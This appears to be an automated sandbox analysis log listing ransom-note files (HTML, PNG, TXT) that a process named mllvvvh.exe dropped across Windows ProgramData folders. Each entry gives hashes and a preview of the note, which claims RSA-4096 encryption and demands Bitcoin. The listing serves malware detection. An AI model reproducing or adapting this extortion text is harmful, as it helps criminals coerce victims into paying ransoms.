                  MD5:6CD7A7401C4FCBB8B45A6183CC9EE413
                  SHA1:4088A6DF18463B9191A745D5ABEC9C184B2BDEEE
                  SHA-256:DE76D63BAB99866338E4226F46B77095EFBDAA53134D8A6FF6928C901A6966B9
                  SHA-512:06D6C4A3B6D94DC7C2DA12525DD9D81E66A48418DBE510FDDCA50085240176DCBE34FFE050AAF949ABA89164B1561508D83B6545106ACBDFB2C046081F632D01
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft OneDrive\setup\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft OneDrive\setup\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft OneDrive\setup\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\AppV\Setup\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):62848
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkL
                  MD5:D8CEF461F8767D26948B8CD44CECF2E1
                  SHA1:537908FB65BAE7EB3C5917D9C5171D46522FEB18
                  SHA-256:017AD361A67C719BC8F05AB012CDC366912ABE6317853590F3979FA2C45D2E2D
                  SHA-512:778B6C27BF28FA4392F2C48FCE603FBF3192BFA548FA257AF0EAD3E9BA3FDA8A971EFC046CCF7DA389D78892E40313B4393A0469E0849880B9509570608C5235
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\AppV\Setup\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):542016
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCP
                  MD5:D6D12315C5392CB85E511974AE2BB7B4
                  SHA1:3B57D3392D90430B7B2423E566C4B3C64A3BA6FC
                  SHA-256:24E1941631CF2BD3A856BF94D4783325266D10E44EFD067B2E988780B8531916
                  SHA-512:9AEE5774C57BC36CA31E8053E17D287282C30B4077197D07A4EE91443C9DF31FA28AC93B5D5684E463647C8B317C15B8E2757D4C7AE38ABFE471CDB934FEF21F
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\AppV\Setup\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):16776
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5u
                  MD5:6CD7A7401C4FCBB8B45A6183CC9EE413
                  SHA1:4088A6DF18463B9191A745D5ABEC9C184B2BDEEE
                  SHA-256:DE76D63BAB99866338E4226F46B77095EFBDAA53134D8A6FF6928C901A6966B9
                  SHA-512:06D6C4A3B6D94DC7C2DA12525DD9D81E66A48418DBE510FDDCA50085240176DCBE34FFE050AAF949ABA89164B1561508D83B6545106ACBDFB2C046081F632D01
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\AppV\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):70704
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkGkL
                  MD5:60B3A4062ABE3EA49E6EB8911977B25E
                  SHA1:E046E8388CABEAA51B3E3FF27CE6434F2A6A0562
                  SHA-256:CFF09453B6ECB0B0E2D0852C1615A4AB6074BC5AD97C38EDC31EA82A7EF58740
                  SHA-512:90F7D4F8735F24BE3FF2CE49412BE3E2497C02A3C45D1143DEF24F1B5E8A9C03F1BFAD028ACD58403725BFB98113B65C43E5EDDCF4681F0F8B3656924579CEF5
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\AppV\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):609768
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCc
                  MD5:E8D2A8D45AE6681B32BED0C71800A1EA
                  SHA1:AB33C23D6A69B473CA0E6A40D194BA7AE5ACB066
                  SHA-256:CCF4C9E7968DA09FABC49BCDBAB494296C5AE1508FD69DF675C1C880D2BE8FFD
                  SHA-512:FF5109BDF2D8C4C755687F560BADBED3DEF165EDFB8B9C43C9DAB6059756C1D9FDC2C5405BBC759E14BAF1B76C5E5ABE2203CF48973F9AFB9849B20FA996FBA9
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\AppV\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):18873
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5/5u
                  MD5:ADC60E08450FC05F8E5AAAA3EB29750B
                  SHA1:3C6E978C14B69A4B4BCFA3D3996FB9A212AF25EC
                  SHA-256:A4C281C75F49278501AC118F0F51A6A296FFEEB9492DFD5B7572505734000BA0
                  SHA-512:ED9BC8B77C3A7345E13B1043C18A9287F6ABFCFD730ADA5EF0624DA8DFFC51C6BACD1709D5F7257959E6B754A0F8700A537D00DE5FEB1B76CDAACF6535A384F9
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Crypto\DSS\MachineKeys\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):62848
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkL
                  MD5:D8CEF461F8767D26948B8CD44CECF2E1
                  SHA1:537908FB65BAE7EB3C5917D9C5171D46522FEB18
                  SHA-256:017AD361A67C719BC8F05AB012CDC366912ABE6317853590F3979FA2C45D2E2D
                  SHA-512:778B6C27BF28FA4392F2C48FCE603FBF3192BFA548FA257AF0EAD3E9BA3FDA8A971EFC046CCF7DA389D78892E40313B4393A0469E0849880B9509570608C5235
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Crypto\DSS\MachineKeys\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):542016
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCP
                  MD5:D6D12315C5392CB85E511974AE2BB7B4
                  SHA1:3B57D3392D90430B7B2423E566C4B3C64A3BA6FC
                  SHA-256:24E1941631CF2BD3A856BF94D4783325266D10E44EFD067B2E988780B8531916
                  SHA-512:9AEE5774C57BC36CA31E8053E17D287282C30B4077197D07A4EE91443C9DF31FA28AC93B5D5684E463647C8B317C15B8E2757D4C7AE38ABFE471CDB934FEF21F
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Crypto\DSS\MachineKeys\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):16776
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5u
                  MD5:6CD7A7401C4FCBB8B45A6183CC9EE413
                  SHA1:4088A6DF18463B9191A745D5ABEC9C184B2BDEEE
                  SHA-256:DE76D63BAB99866338E4226F46B77095EFBDAA53134D8A6FF6928C901A6966B9
                  SHA-512:06D6C4A3B6D94DC7C2DA12525DD9D81E66A48418DBE510FDDCA50085240176DCBE34FFE050AAF949ABA89164B1561508D83B6545106ACBDFB2C046081F632D01
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Crypto\DSS\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):62848
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkL
                  MD5:D8CEF461F8767D26948B8CD44CECF2E1
                  SHA1:537908FB65BAE7EB3C5917D9C5171D46522FEB18
                  SHA-256:017AD361A67C719BC8F05AB012CDC366912ABE6317853590F3979FA2C45D2E2D
                  SHA-512:778B6C27BF28FA4392F2C48FCE603FBF3192BFA548FA257AF0EAD3E9BA3FDA8A971EFC046CCF7DA389D78892E40313B4393A0469E0849880B9509570608C5235
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Crypto\DSS\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):542016
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCP
                  MD5:D6D12315C5392CB85E511974AE2BB7B4
                  SHA1:3B57D3392D90430B7B2423E566C4B3C64A3BA6FC
                  SHA-256:24E1941631CF2BD3A856BF94D4783325266D10E44EFD067B2E988780B8531916
                  SHA-512:9AEE5774C57BC36CA31E8053E17D287282C30B4077197D07A4EE91443C9DF31FA28AC93B5D5684E463647C8B317C15B8E2757D4C7AE38ABFE471CDB934FEF21F
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Crypto\DSS\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):16776
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5u
                  MD5:6CD7A7401C4FCBB8B45A6183CC9EE413
                  SHA1:4088A6DF18463B9191A745D5ABEC9C184B2BDEEE
                  SHA-256:DE76D63BAB99866338E4226F46B77095EFBDAA53134D8A6FF6928C901A6966B9
                  SHA-512:06D6C4A3B6D94DC7C2DA12525DD9D81E66A48418DBE510FDDCA50085240176DCBE34FFE050AAF949ABA89164B1561508D83B6545106ACBDFB2C046081F632D01
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Crypto\Keys\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):62848
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkL
                  MD5:D8CEF461F8767D26948B8CD44CECF2E1
                  SHA1:537908FB65BAE7EB3C5917D9C5171D46522FEB18
                  SHA-256:017AD361A67C719BC8F05AB012CDC366912ABE6317853590F3979FA2C45D2E2D
                  SHA-512:778B6C27BF28FA4392F2C48FCE603FBF3192BFA548FA257AF0EAD3E9BA3FDA8A971EFC046CCF7DA389D78892E40313B4393A0469E0849880B9509570608C5235
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Crypto\Keys\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):542016
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCP
                  MD5:D6D12315C5392CB85E511974AE2BB7B4
                  SHA1:3B57D3392D90430B7B2423E566C4B3C64A3BA6FC
                  SHA-256:24E1941631CF2BD3A856BF94D4783325266D10E44EFD067B2E988780B8531916
                  SHA-512:9AEE5774C57BC36CA31E8053E17D287282C30B4077197D07A4EE91443C9DF31FA28AC93B5D5684E463647C8B317C15B8E2757D4C7AE38ABFE471CDB934FEF21F
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Crypto\Keys\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):16776
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
